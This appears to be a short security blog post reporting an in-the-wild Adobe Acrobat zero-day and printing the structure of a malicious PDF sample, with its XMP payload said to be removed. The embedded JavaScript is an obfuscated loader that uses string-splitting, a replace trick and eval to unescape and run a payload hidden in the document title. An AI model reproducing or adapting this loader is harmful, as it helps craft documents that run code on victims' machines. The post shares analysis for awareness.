Apparently a zero day PDF exploit is still on the wild, targeting unpatched Adobe Acrobat users. Here’s an actual exploited PDF file (with the XMP payload removed to prevent script kiddies from using it):
Viruscan: http://virusscan.jotti.org/en/scanresult/ac0da53fe0e1ba5a0cece750df99facf167c4f84
%PDF-1.6
%âãÏÓ
1 0 obj
<<
/Length 815
>>
stream
var WAR3waKpZWBejbjDeKi = "";
var aMbR2mgd51lH4GSUJO6d = "";
function xxy()
{
return eval("tfAPKu258gOq71H9nxm = th"+"i"+"s.in"+"fo.ti"+"tle;");
}
function bk8ptS715zGdW3ifCpt(K285VuiNxOXl0ItyBL6,
K285VuiNxOXl0ItyBL6asd,SRg0oP9jIARmhGFqrxGfg)
{
var ReSPECTTTa = eval;
ReSPECTTTa(K285VuiNxOXl0ItyBL6);
}
function aQ6T4bVlGiaAFcIK8C3(SRg0oP9jIARmhGFqrxG,WAR3waKpZWBejbjDeKisdf,
aQ6T4bVlGiaAFcIK8C3as,K285VuiNxOXl0ItyBL6a)
{
var iyX02nbW7zbkDGvdapf = "%";
var FFFoFF = "WAR3waKpZWBejbjDeKi = SRg0oP9jIARmhGFqrxG.replace(/4563234 d 2342342 a 2343 b 342/g,iyX02nbW7zbkDGvdapf);"
var ReSPECTTT = FFFoFF; eval(ReSPECTTT);
bk8ptS715zGdW3ifCpt("var MbR2mgd51lH4GSUJO6d = u"+"n"+"e"+"s"+"cap"+"e(WAR3waKpZWBejbjDeKi);");
bk8ptS715zGdW3ifCpt(MbR2mgd51lH4GSUJO6d);
}
xxy();
aQ6T4bVlGiaAFcIK8C3(tfAPKu258gOq71H9nxm);
endstream
endobj
2 0 obj
<<
/Subtype /XML
/Length 3453
/Type /Metadata
>>
stream
application/pdf
Miekiemoes
2008-09-24T19:47:56Z
Adobe
2010-07-05T15:03:59+01:00
2010-07-05T15:03:59+01:00
Notepad
uuid:62db894a-66c1-49be-8781-ec7649fbfea8
uuid:66d2ac0a-c842-40b1-9122-f7f594c6f814
endstream
endobj
3 0 obj
<<
/Length 155104
>>
stream
endstream
/Author (Miekiemoes)
/Producer (Notepad)
/ModDate (D:20100705150359+01'00')
/CreationDate (D:20080924194756Z)
>>
endobj xref
0 11
0000000000 65535 f
0000000015 00000 n
0000000884 00000 n
0000004422 00000 n
0000159583 00000 n
0000159857 00000 n
0000159642 00000 n
0000159686 00000 n
0000159734 00000 n
0000160030 00000 n
0000160114 00000 n
trailer
<<
/Info 10 0 R
/Root 8 0 R
/Size 11
/ID [ ]
>>
startxref
315416
%%EOF
